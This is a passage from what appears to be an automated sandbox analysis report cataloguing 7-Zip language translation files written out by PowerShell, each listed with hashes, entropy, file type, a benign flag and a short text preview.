                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Lucian Nan : http://www.prizeeinternational.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Romanian..Rom.n...401..Bine..Anulare........&Da..&Nu..&.nchide..Ajutor....&Continu...440..Da, pe &toate..N&ici unul..Opre.te..Restarteaz....n &fundal..La &suprafa....&Pauz....n pauz...E.ti sigur c. vrei s. anulezi?..500..&Fi.ier..&Editeaz...&Vizualizeaz...F&avorite..&Unelte..&Ajutor..540..&Deschide..Deschide .&n..Deschide .n &afar...&Vizualizez...&Editeaz...&Redenume.te..&Copiaz. la.....&Mut. la......ter&ge...mparte &fi.ierul.....&Une.te fi.ierele.....&Propriet..i..Comen&tariu..Calculeaz. suma de verificare....Creaz. director..Creaz. fi.ier..&Ie.ire..600..&Selecteaz. tot..&Deselecteaz. tot..&Inverseaz. selec.ia..Selecteaz......Deselecteaz......Selecteaz. dup. tip..Deselecteaz. dup. tip..700..Iconi.e m&ari..Iconi.e m&ici..&List...&Detalii..730..Nesortat..Vedere plan...&2 panouri..Bare de &unelte..Deschide directorul r
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14667
                                                                                                                                                          Entropy (8bit):4.350951749459389
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iW2LUMKClXfitECTGV0jxOfXYCjisdvyMpf5ZOO8gCS4nY5tbV67wyxZ+XU2WtWK:i+ptEGntQYpY6MXsO7ChKeZ+HWKk
                                                                                                                                                          MD5:B5CEC4D03D2D9E162137E475C54AFBC3
                                                                                                                                                          SHA1:3E86AE0174A096B07173C623B637122E4323DD29
                                                                                                                                                          SHA-256:AC73D4810639114C3269E3BEAEC84ECAC9473CA6FBC248D804A09DF2B33E4351
                                                                                                                                                          SHA-512:CB78BD4F6D7D94780BF84F6618A2800A3B6885485C6CB7B0836AFFCB9CA6F6734834FB84F756946E59595067788CD1B1A230CEC760E39D3EA0BAF523F7CC7647
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.10 : 2018-03-29 : Igor Pavlov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Russian...........401..OK................&....&.....&...................&............440.... ... &......... ... .&.......................&.......&.. ........ ......&......... ......... ............. ...... ........ ........?..500..&......&........&.....&............&.......&.........540..&................ &............... .....&..............&....................&..........&.......... ......&........... ......&...........&..... ..........&......... .............&............&...................... .................&....... ...........&.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19628
                                                                                                                                                          Entropy (8bit):3.8659793731095453
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:isw3ma17q9ntvNTsld5VFxxwMkAGO310F0klrfofmR7HOwPyng:HwQvVnQg
                                                                                                                                                          MD5:9FE4DA297163A84FE9D0B0289B1AF077
                                                                                                                                                          SHA1:D14A6A318A50F2F13E45B2269EA2AD8FC5E3C44A
                                                                                                                                                          SHA-256:A44E8C328BF809890AA6CA883E2CB82B6C5207D9636E9A91253DA4CD893668C8
                                                                                                                                                          SHA-512:A6FEE2F3D6448F1F5BE6EC88B51FB65EBD07C7BA3DBAF2F7A801FEF54B9DA410E6B800094853180A884889B304EA9A54672781FA7D0F1067AF6C4A63C494A44B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma, ....... .... ..... ......... .... ...., .. ...... ! .. .........! .... ...... ....... .......;..;..;..;..;..;..;..;..;..;..0..7-Zip..Sanskrit, Indian, .......................401..... ...................&.....&....&... ..............&.... .....440..&....... .....&....... .............. .... ......&............&........(.........)..&......................... .... .... ..... ... ....... .... ..... ....?..500..&........&..........&.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16972
                                                                                                                                                          Entropy (8bit):4.2388610920003975
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iIOc5iNEOdZPFVIz36hkSuWjJyzB8X/qCwd5WvZNkad73+ivI/MpngGhNJDkGx/p:2XNnZ9/u59CC5WHt9I/rGhPRx9+7SuJc
                                                                                                                                                          MD5:2B78E18BCB07CB8D59D8682502576F8E
                                                                                                                                                          SHA1:C277B543EE18441681CDAFF9EFEAD09963BF9604
                                                                                                                                                          SHA-256:3899EDD17A78BC729278304F7B0AE7750C422A5BA684AAC9EDC15B8527A229DA
                                                                                                                                                          SHA-512:DA07AF56BBD954828623C7B38FD3E6CDFE89DF98F2525AA486A43FDD17EA5CE79F90E691B1F459DF5238B04B3FFF0FED58559BC93E15559FF6D8D2A2CF4DA172
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : ...... ....... (Supun Budhajeewa)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Sinhala.........401..................... (&Y)...... (&N)....... (&C).............. ...... (&C)..440.......... ... (&A).......... ....(&L)....................... ................ (&B)........... (&F)...... ...... (&P)...... .... ............ ...... .. ....... . ?..500....... (&F)......... (&E)...... (&V)........ (&A)........ (&T)...... (&H)..540....... ..... (&O)....... ..... ..... (&I)......... ..... ..... (&U)......
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9372
                                                                                                                                                          Entropy (8bit):5.379400863038617
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ihqYyHuLGHP372c79qAFklXva+hF+zmTzeNMR:iMjUGHP72cJqAFAXi+hs0aNMR
                                                                                                                                                          MD5:CA2B22D21945A478757A099EEAFDF9A9
                                                                                                                                                          SHA1:5EFBF215647E82DDEAA4C83D064EF83B51413DEA
                                                                                                                                                          SHA-256:E571C0D87B50F4659099B4CA618057533C22578066E411C5CEB3DF8BE1E77CFF
                                                                                                                                                          SHA-512:40365AC6CDD70FF7B7AB09482E1E9263B1B131772019EDA357007D029A879111DA72B05756ADBFC3206B1C060211A16B5F10D507FB0CAA3696907C8433FE9537
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Tomas Tomasek..; 9.07 : Pavel Deve.ka..; 9.38 beta : 2015-01-11 : Roman Horv.th..;..;..;..;..;..;..;..;..0..7-Zip..Slovak..Sloven.ina..401..OK..Zru.i.........&.no..&Nie..&Zavrie...Pomocn.k....Po&kra.ova...440...no na &v.etko..Nie na v.&etko..Zastavi...Re.tartova...&Pozadie..P&opredie..Po&zastavi...Pozastaven...Ste si ist., .e chcete akciu zru.i.?..500..&S.bor..&Upravi...&Zobrazi...&Ob..ben...&N.stroje..&Pomocn.k..540..&Otvori...O&tvori. vn.tri..Ot&vori. externe..&Zobrazi...&Upravi...&Premenova...&Kop.rova. do.....P&resun.. do.....O&dstr.ni...Ro&zdeli. s.bor.....Zl..&i. s.bory.....V&lastnosti..Ko&ment.r..Vypo..ta. kontroln. s..et..Rozdiel (Diff)..Vytvori. prie.inok..Vytvori. s.bor..Uko&n.i...Odkaz.....600..Ozna.i. v.etko..Odzna.i. v.etko..Invertova. ozna.enie..Ozna.i......Odzna.i......Ozna.i. pod.a typu..Odzna.i. pod.a typu..700..&Ve.k. ikony..&Mal. ikony..&Zoznam..&Podrob
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8586
                                                                                                                                                          Entropy (8bit):5.014328026612101
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iGCcUhGAoKfrxHa5Qn6dq5OSsZf1G1huHF8fY1oTraGAF7S+pVss0Bu2mXXF6OG:iJhFoKlZZoZ9Gi52rChEmXAOG
                                                                                                                                                          MD5:7004B98D09316E84156B91C54888C9D4
                                                                                                                                                          SHA1:39C8681E497DDE4CCFFA3BF8D15B53627757ECE8
                                                                                                                                                          SHA-256:548AA8422A228617B30FBD448D03C38C3A11D010051A24544CF8AE479314ACD8
                                                                                                                                                          SHA-512:C48F4BACED7A4FAF958712225A5326CA2225DD7B396164787AD2C83A0314774E9126FA510EBA37B1AB2FF26C67A7AAAA0BA9129B0D97A119AD1D726A56A33066
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : tomazek..; 4.55 : miles..;..; 21.00 : 2021-01-19 : Jadran Rudec..;..;..;..;..;..;..;..0..7-Zip..Slovenian..Sloven..ina..401..Vredu..Prekli.i........&Da..&Ne..&Zapri..Po&mo.....&Nadaljuj..440..Da za &vse..Ne za v&se..Ustavi..Znova za.eni..Ozad&je..&Ospredje..Premor..Na premoru..Ali ste prepri.ani, da .elite preklicati?..500..Datoteka..Urejanje..&Prikaz..Priljubljene..Orodja..Pomo...540..&Odpri..Odpri &znotraj..Odpri zu&naj..P&rikaz..&Uredi..Prei&menuj..&Kopiraj.....&Premakni.....Iz&bri.i..&Razdeli datoteko.....&Zdru.i datoteke.....L&astnosti..Ko&mentar..Izra.unaj preizusno vsoto..Razlika..Ustvari mapo..Ustvari datoteko..&Izhod..Povezava..&Nadomestni tokovi..600..Izberi &vse..Razveljavi izbiro vseh..&Preobrni izbor..Izberi.....Razveljavi izbiro.....Izberi po vrsti..Razveljavi izbiro po vrsti..700..&Velike ikone..&Majhne ikone..&Seznam..&Podrobnosti..730..Nerazvr..eno..Ploski prikaz..&Dve podokni..&Orodne vrstice..Odpri korensko mapo..Eno raven
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11993
                                                                                                                                                          Entropy (8bit):4.283284821303782
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iCk9ED/u0/rzMXyBMtR/TL0wN1i9Rd9u3ZDxoAF9sOVbvmyz3xnvze0kIqLm3HGX:iCk94zBWv0b9P9gZ1lLhnbe8q0tfsH6o
                                                                                                                                                          MD5:FFD26304B9B5FAE8547703515E84460D
                                                                                                                                                          SHA1:CFF3F023BB47CA3C6C3DB202CD8C126B0BB2F59F
                                                                                                                                                          SHA-256:283DD99EC8D13784B3D79C36766CDB16DAC0EDE0C1C09E8B1EFA64F5DC2C1A55
                                                                                                                                                          SHA-512:0A4E39E2598C73F936E4C8BD56201FEE00AEB5DAAB0D7B735D5137A8B7C15830B40F028C77B528B75653540836098F5E8FC059111DD2EFBD0A46DDBDF97465C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Lazar..; 9.07 : Ozzii..;..;..;..;..;..;..;..;..;..0..7-Zip..Serbian - Cyrillic........ - ..........401... .......................................................440.... .. ....... .. ................................ ...................... .. ... ....... .. ...... .. .........?..500.......................................................540.................. .. 7-Zip-.......... .. ........... ................................................. .............. .................... ............. .......................................... ........ ....................... .............. .................60
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7169
                                                                                                                                                          Entropy (8bit):5.029859884824853
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZjnEAuD8cvkp9HRmD+eyl3NLH0qgGOzeVTs8rmXab4f:i5EL8cIxMQGGjuXasf
                                                                                                                                                          MD5:FD327F424C7E4F23D2C018DED334A1B5
                                                                                                                                                          SHA1:0FE9A48C528BE4022B19F7373CBA9190D3BDB473
                                                                                                                                                          SHA-256:D5A250B45BD51267E2B0D78CF60E7F14113419565F9B95C2B1113963396570A5
                                                                                                                                                          SHA-512:AE6C2959A5348BDBC1464FD0E08A3A00F8598A2D423381E5883347A85E88F7749659E0FAC4F89D6CCBC74A1E83F47EC4F42CAC22115CA3921DEF00DE41978ADB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Lazar..; 9.07 : Ozzii..;..;..;..;..;..;..;..;..;..0..7-Zip..Serbian - Latin..Srpski - latinica..401..U redu..Otka.i........Da..Ne..Zatvori..Pomo.....Nastavi..440..Da za sve..Ne za sve..Stani..Ponovo..Pozadina..Na vrhu..Pauza..Pauza..Da li ste sigurni da .elite da prekinete?..500..Datoteka..Ure.ivanje..Pregled..Omiljeno..Alati..Pomo...540..Pogledaj..Otvori sa 7-Zip-om..Otvori sa pridru.enom programom..Pregledaj..Promeni..Preimenuj..Kopiraj u.....Premesti u.....Obri.i..Podeli fajl.....Spoj delove.....Svojstva..Komentar..Izra.unajte provernu veli.inu..razlika..Nova fascikla..Nova datoteka..Izlaz..600..Izaberi sve..Poni.ti izbor svega..Obrnuti izbor..Izaberi.....Poni.ti izbor.....Izaberi po tipu..Poni.ti izbor po tipu..700..Ikone..Naporedno slaganje..Spisak..Detalji..730..Bez sortiranja..Ravan pregled..2 Prozora..Trake sa alatkama..Otvori po.etnu fasciklu..Gore za jedan nivo..Hronologija.....Osve.avanje..750..Rad sa arhivama..Rad sa datotekama.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8924
                                                                                                                                                          Entropy (8bit):5.0752452779778086
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iIRthqlCnYhI0sbVA28ta0obRFz+3uCFQ9/FLFDLb0Y620X9CWHdfSzuQ3lBMjiC:iIzhdnY+bi2tWIFLJb0Y62dWHuTlC
                                                                                                                                                          MD5:2EC8B6F0C0C05157AE90ABA540DEBED1
                                                                                                                                                          SHA1:56DE30674CF6ED17AE1FD42080214573B8383789
                                                                                                                                                          SHA-256:54112B265EC01759ADBF72DC856FF0F9DBB2B3029EFF8A56DE08DFFC5D3DC954
                                                                                                                                                          SHA-512:6CB83B0D3DB5254E47F86100C38BE073F257B4F2E643F14E91DF9CCAC36A631BF06E52CE8F98106F5A17CF19745F2B6277605968BFEB9E0D423B1FD3AB5C0A06
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Andreas M Nilsson, Christoffer Enqvist..; 4.59 : Bernhard Eriksson..; 15.00 : 2021-11-17 : Mikael Hiort af Orn.s..;..;..;..;..;..;..;..;..0..7-Zip..Swedish..Svenska..401..OK..Avbryt........&Ja..&Nej..&St.ng..Hj.lp....F&orts.tt..440..Ja till &alla..Nej till a&lla..Stoppa..Starta om..&Bakgrunden..&F.rgrunden..&Pausa..Pausad...r du s.ker p. att du vill avbryta?..500..&Arkiv..&Redigera..&Visa..&Favoriter..Verkt&yg..&Hj.lp..540..&.ppna...ppna &internt...ppna &externt..&Visa..&Redigera..&Byt namn..&Kopiera till.....&Flytta till.....&Ta bort..&Dela upp fil.....&Sammanfoga filer.....E&genskaper..Komme&ntera..Ber.kna kontrollsumma..Differens..Skapa mapp..Skapa fil..&Avsluta..Skapa l.nk..&Alternativa datastr.mmar..600..Markera &alla..Avmarkera alla..&Invertera markering..Markera.....Avmarkera.....Markera efter typ..Avmarkera efter typ..700..St&ora ikoner..Sm&. ikoner..&Lista..&Detaljerad lista..730..Osorterad..Platt vy..&Tv. paneler..&Verktygsf.l
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8562
                                                                                                                                                          Entropy (8bit):4.876402900973041
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7F+9CSE///gXaidWrT8PpH0fKxsyEeHRinn:74Cto9paKxsRn
                                                                                                                                                          MD5:EE27959AEF24CEF2EC07684CF420B2DD
                                                                                                                                                          SHA1:07D9B4D2B4AB10B3341F3286CEE73185DAAAD918
                                                                                                                                                          SHA-256:AAEB1631458E448B678579CE369FD0A6D66E0FB02B9218328C537EE38636C557
                                                                                                                                                          SHA-512:9E0FD7DB8D799763EEE9980D8C2B0864640FB74A86036D337B019AC317A3541CBA6D65AF1C4179ED46D64D4005395CD6C761F6A234428DF3F1FB04634955242F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 15.00 : 2020-05-15 : Mara Gati Lucky (http://electricity.co.ke)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Swahili..Kiswahili..401..Sawa..Ghairi........&Ndio..&Hapana..&Funga..Usaidizi....&Endelea..440..Ndio kwa &zote..Hapana kwa z&ote..Simamisha..Washa upya..&Mandharinyuma..&Mandharimbele..&Tuliza..Imetulizwa..Una uhakika unataka kughairi?..500..&Faili..&Hariri..&Mwoneko..Z&inazopendwa..&Zana..&Usaidizi..540..&Fungua..Fungua &ndani..Fungua n&je..&Mwoneko..&Hariri..Pati&a jina upya..&Nakili hadi.....&Sogeza hadi.....&Futa..&Gawiza faili.....Ung&anisha nyaraka.....S&ifa..Toa m&aoni.....Kokotoa checksum..Tofautisha..Unda kabrasha..Unda faili..F&unga..Kiungo..&Mitiririsho mbadala..600..Teua &zote..Ondoa uteuzi wote..&Pindua uteuzi..Teua.....Ondoa uteuzi.....Teua kulingana na aina..Ondoa uteuzi kulingana na aina..700..Iko&ni kubwa..Ikoni ndogo..&Orodha..&Maelezo..730..Haijapangwa..Mwoneko bapa..&2 paneli..&Miambaa zana..Fungua kabrasha shina..Juu kiwango kimoja..Historia
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12935
                                                                                                                                                          Entropy (8bit):3.7840989858328618
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igMxAhP2NKfBuRZjaaC1e13/BNhpYY+KEHtiAnCuu1+AuvB1nNh11N:irlNZjagbAn3
                                                                                                                                                          MD5:228CA6D7B8D850853233C4575A7EBF1F
                                                                                                                                                          SHA1:4BC90FCA87925F7D855972F5DC67EF5E9E29B438
                                                                                                                                                          SHA-256:0A3B285566BBEB3F188B3C72BA21CBFC545EA05471EAB706E972C828DA5234E0
                                                                                                                                                          SHA-512:2995D1C2BACC8C0EE757FC47FE9C8AC07F1EE74AE3A70BBBCC66CBCFA13A924855B3F7515D04031434870829BE34F0FB49A35388EAFFACC0E7A33F9A44A02870
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15127
                                                                                                                                                          Entropy (8bit):4.407760431254582
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iLcxMil07H3brpQXBwkGE3RypQcG3XlDrpQK3I5D2OleVZZd3K5RATp+O1jR40pE:imK3bMlGE34Q3FBT3eDoZdaOHfllqzDv
                                                                                                                                                          MD5:4A5529986613CDF743B3F7755F8F5CAE
                                                                                                                                                          SHA1:970DFAD147AB3D32E93EEF6BF464BCAC23368E4F
                                                                                                                                                          SHA-256:1CEDD8F699940FECACACBC5DF093BA70FB2099FAF9864376A3D990DA78B8E075
                                                                                                                                                          SHA-512:1F7E8A8A21E8E5FAF546B2F4C621B326A907AFA017DD8221022DF2D19B3E41D10D5157A8713F8D5485601311029F4E25DCB21D0E9B4991B6D26D651B416239C0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16219
                                                                                                                                                          Entropy (8bit):4.008729331792855
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ir9n+rMUfsqjeWnShfO1LpBIB9jip10zsPRO2a8fUhe1RBC6sl4wjn/PqIpqINAG:09n+4csqjeWnSh21LpBIB1O10zsPRO2e
                                                                                                                                                          MD5:8EE06A03DC18E5F8BC750CB6A78F6D9C
                                                                                                                                                          SHA1:179C195700DF844216C2CABDC17062CDDBD1D6B3
                                                                                                                                                          SHA-256:01E7B965BD4B722003F74B4E4B30EF6A1BAEA67108816D1B9F8D6ADD39C7FA10
                                                                                                                                                          SHA-512:4C908BA391BAC8BD36BF76B5C3B59DD59EB71F2513BCD04C47CBDE683AD463C0FEAC5D5AADA67730F3F566156C4BEFF09CD7B7D1EB043B988AD7938B9041C4EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9236
                                                                                                                                                          Entropy (8bit):5.262770526013847
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7toKrLbypqg+g8p0k9DMfjrdTU4dX81abJjrkLPFT8jPJzVIj7dYqxMXXDqit:7mKr2qL3oRUU81oBmPFwb9VY7dYqxMmm
                                                                                                                                                          MD5:75C23D0431BC83CA17308F08D1173C1D
                                                                                                                                                          SHA1:A052E61036E0DA973253BA225031D5929EE5E2D5
                                                                                                                                                          SHA-256:75EFF9DE596459F3EBA755B5C4C8CE635AF2CECDBAE40749DF348C97A2E56EE0
                                                                                                                                                          SHA-512:10872E31DF08E59D080BE3C0B975DF06E2E8BCECEA14FCF9F547965143A9652C8B9ED50D38232A72B8F0745C964F4E616B06368D9983F35BA05FBCBF2294900B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 19.00 : 2019-03-04 : Merdan NURIYEV Hazar-Balkan H.K...;..;..;..;..;..;..;..;..;..;..0..7-Zip..Turkmen..T.rkmen.e..401..Howwa..Go.bolsun et........&Howwa..&.ok...a&p..K.mek al....&Dowam et..440..Hemmesine howw&a..Hemmesine &.ok..Dur..Ga.tadan ba.la..&G.r.nme..&..e .yksyn..&S.gindir..S.gindi..Go.bolsun etjekmi?..500..&Dos.a..&D.zelt..&G.r..F&aworitler..G&urallar..&K.mek..540..&A...&I.inde A...Da.&ynda A...&G.r..&D.zelt..Adyn&y ..tget...u .ere &kop.ala......u .ere &g...r.....&...r..Fa.ly &b.l.....Fa.llary &birle.dir.....&D.zg.nlemeler..Tes&wir.....Barlag jemini hasapla..Tapawutlanma ..Bukja d.ret..Fa.l d.ret..&.yk..Bag ..Akymlary .&aly...600..Hemmesini Se...Hemmesini Se.me..Se.im&i tersine .w.r ..Se......Se.me.....Tiplerine g.r. se...Tiplerine g.ra se.me..700..U&ly Ikon..Ki.i Ikon..Tablissa..Jikme-jikleri..730..Sortlanmadyk..D.z G.rn....&2 Paneller..&Esbaplar..D..p Bukjany A...Bir Tekje .okary..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9799
                                                                                                                                                          Entropy (8bit):5.273356189152464
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:irkBYXKvLRGGtGcunN8uRvXWt2GSdRHI2Je4Sv6J57kLbLaK/FwacCz:irkBgg3GJ8uhXWtfGRH5o9D
                                                                                                                                                          MD5:C69BE29E4448A858180DAF367464D531
                                                                                                                                                          SHA1:D83819911331F73BC35E2EB02EC1FBCDDDF30B7D
                                                                                                                                                          SHA-256:4816929C4BB958CE8D64D14DF47F0B6A35DCF0E7EB88201EAA93AF541894E354
                                                                                                                                                          SHA-512:469BE1075E9A5C4CC8BB6A0B55E645448EDA3D46527A5561CD55807F5E52C3410904A34E0E64E11F963153D5CEA5CCF16E7E7FC7ED63AEA3FBE532959056AA77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2018-11-21 : Kaya Zeren..; 9.07 : 2009-09-22 : X-FoRcE ..;..;..;..;..;..;..;..;..;..0..7-Zip..Turkish..T.rk.e..401..Tamam...ptal........&Evet..&Hay.r..&Kapat..Yard.m....&Devam..440..T.m.ne E&vet..T.m.ne Ha&y.r..Durdur..Yeniden Ba.lat..&Arka Planda...&n Planda..&Duraklat..Duraklat.lm.....ptal etmek istedi.inize emin misiniz?..500..&Dosya..D.z&enle..&G.r.n.m..&S.k Kullan.lanlar..&Ara.lar..&Yard.m..540..&A...7-Zip ..i&nde A...&Varsay.lan Uygulamada A...&G.r.nt.leyici..D.z&enle..&Yeniden Adland.r..Klas.re Ko&pyala.....Klas.re &Ta.......&Sil..Dosyay. &B.l.....Dosyalar. Bi&rle.tir......&zellikler..A..kla&ma......Sa.lamalar. Hesapla..Fark..Klas.r &Olu.tur..Dosya Ol&u.tur....&k..Ba&.lant...Ak..&lar. De.i.tir..600..T.m.n. &Se...T.m.n. B.rak..Se.imi &Tersine .evir..Se......T.m.n. B.rak.....Ayn. T.rdekileri Se...Ayn. T.rdekileri B.rak..700..B.y.k Sim&geler..K...k Si&mgeler..&Liste
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14202
                                                                                                                                                          Entropy (8bit):4.5738343406459805
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:idiangc64QGQ6p6Wc84DqdqQdP9YW0XyU9ondS8O20Biu9J5:rag/4Tzp6Wc84Dq0QdP9YiUGnmiu9T
                                                                                                                                                          MD5:6E299B81EDACF15FACE1271D032CC5A0
                                                                                                                                                          SHA1:F2E955FD7BBF9140F0E86BF1A759D729C9A4E4DA
                                                                                                                                                          SHA-256:18479D66E0C8B5144EA32CC9D6B58EB8748E80D2C3BDEC0DBD99BBC3AB42495D
                                                                                                                                                          SHA-512:84E9484319DEB5A7049FE130290A7D67A8FAEFC9A17F7B2CE9F9586FB0F0641B839BAE681C6F8FFEF551780F56166C9886C1F7F6F0DF386389F44710423B9865
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11386
                                                                                                                                                          Entropy (8bit):4.7182582221463525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iDIm9xflePh286zK/bnZ6U4EeBVDeZTyUZirOCsiCjcY8VFDZ:iNMPhhrBNeBVSTTZUwiCuDZ
                                                                                                                                                          MD5:EF3E8D61D03E42A3B40D6F0B12535ADB
                                                                                                                                                          SHA1:569360BCFEB39C102A3DD78ED96204B5D733FFBE
                                                                                                                                                          SHA-256:9D0268D1EEB8DFDEBBB8EA1033C2B99CD667A244C9859085BE5D54C9E5CED369
                                                                                                                                                          SHA-512:6E9AFEB0A96DA6D8BF63F06DE421B8D4DDBF4D750E1BDF861FBBDC0268CBEB19068D08787F0F1655B40EBDC603D888251DAE188C3547F32B970C7F927754066A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Sahran..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uyghur............401............. ...........(&Y).........(&N).....(&C).......................(&C)..440......... ....(&A)......... ...(&L).............. ............ ....(&B)....... ....(&F).......... .....(&P).......... .................... ... ...........500........(&F)........(&E).........(&V)........(&A).......(&T)........(&H)..540.....(&O)........... ........ ...(&I)...... ........ ...(&U).........(&V)........(&E)..... .......(&M)......... .....(&C)......... .....(&M)........(&D)........ .......(&S)......... .........(&B).........(&R).........(&N)........ .............
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15180
                                                                                                                                                          Entropy (8bit):4.398927977240258
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iv+2HgJiSSXX7VPkqM6Ix68c65gLKPENwboGxX7xFxexNbK7ExOiyq:LqRRr87Rq
                                                                                                                                                          MD5:D125EF7F9A009CFE4093152E48055AC1
                                                                                                                                                          SHA1:7063F242690890C98296314884E0E6D058C23AFF
                                                                                                                                                          SHA-256:53235CB228DBBB5207F18BD0B318F54FDA9F9F5B05094EA6AC7AE368216CC4EF
